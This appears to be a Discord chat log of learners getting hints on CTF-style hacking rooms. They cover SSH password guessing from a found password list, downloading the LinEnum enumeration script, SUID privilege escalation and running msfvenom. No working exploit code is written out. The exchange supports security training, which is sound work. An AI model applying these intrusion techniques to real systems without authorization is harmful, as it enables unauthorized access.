as you need to change LocalIP to your ip

@inland onyx can I ask, when I ssh into jack-of it say permissions denied

What do you mean?

when I ssh into the machine, jack-of-all-trades, it say permission denied (publickey, password)

That would indicate that you have the wrong password

oh I thought I found the cred

Ah, yeah

Wrong creds

ok, i think i need a push in the right direction

still stuck on that file

Which one?

room/commonlinuxprivesc

how did I go from user3 to root by running a SUID bit file called ./shell?

so maybe it's the form

what i tried so far:
||
file in question: jacks_password_list
seems like some binary, not executable, i checked for magic numbers, doesnt seem to be anything else really
||

@boreal whale suid means the binary runs as the owner

Owner is root, so it runs as root

Uh...
That is literally a list of passwords...

No binary 😁

wat

i tried it as password

so theres some delimiter

oh no

Lemme guess. You opened the list through the website and got one long line?

is it the newline

no

i did cat in the shell

i just thought it was neatly dumped for me

Then yes

The delimeter is the new line

didnt even think about how the newlines are actually PART OF THE FILE

😁

i literally removed all the newlines

and tried the whole thing as password

no it's a list of passwords

like rockyou

yeah, now i'll just use it as wordlist

the horror continues

tbh once you get on it's pretty straight forward

any idea why am I getting this when trying to run LinEnum.sh?
./LinEnum.sh ./LinEnum.sh: line 7: syntax error near unexpected token `newline' ./LinEnum.sh: line 7: `<!DOCTYPE html>'

i mean, a passwordlist is cool and all
but it should actually contain a password that works

any idea why am I getting this when trying to run LinEnum.sh?
./LinEnum.sh ./LinEnum.sh: line 7: syntax error near unexpected token `newline' ./LinEnum.sh: line 7: `<!DOCTYPE html>'
@boreal whale You downloaded the whole web page -- not just the shell

@inland onyx can you give me another push for the privesc section of jack? ive looked through the linpeas output multiple times to no avail

wget https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
isn't this the command ?

No

That downloads the webpage

raw.github.com

use the raw content link

@inland onyx can you give me another push for the privesc section of jack? ive looked through the linpeas output multiple times to no avail
@tardy drum It's something that isn't actually considered a privesc in LinPEAS

Which is why it's sneaky

LinPEAS will show it as being there

But it won't be flagged

👍

oh cool, 2 dumb mistakes later i at least got in

Why did this not word, I am working on the Common Linux Privesc room on task 8.

@weary fox You don't run msfvenom inside metasploit

you run that from a normal terminate

also change the IP to your actual ip

ok

Is it the target ip or the host ip

Also did I do this right

Because it is taking more than 5 minutes

have you run the msfvenom command yet?

yes

wait

i just realized

why is user.jpg executable

🤔

Because I find it funny to mess with people

you are evil

If you ever wanna root one of his boxes

you have to descend into a level of sadism

i still have 3 possible chances

if i exhaust those 3, i'll probably not make it

have you thought about yano just opening it?

wdym

it's a jpg

just open it

yeah, i have had the userflag for a while

im trying to privesc

oh priv esc is just basic linux priv

just basic

linpeas should pick it up

boi i have been doing this for <2 weeks

i actually think i found it

lets see

si

remove and complete the room 😄

wait

remove?

delete the spoiler

😄

oh

so can read anything

aye, i looked through those earlier

but missed it

tbh it took me a minute to realise it was that

used another enum script and it highlighted that one

Ey!!
Well done

once i reach page 100 on this pdf I'll do the walkthrough for it

as it should hit 10 roots tomorrow

Aye, shouldn't take too long to hit 10

Looking forward to a video walkthrough.
(Provided the flags and passes are hidden, as per 😛 )

hiding pw is kinda tricky but see what I can do

Ah, you're a smart cookie -- I hear you're the editing God around here as well 😄

lmao no

😂

Can you mosaic in the software you recommended?

I imagine so

will look into it and do it

Danke ♥️

Right, it's 5AM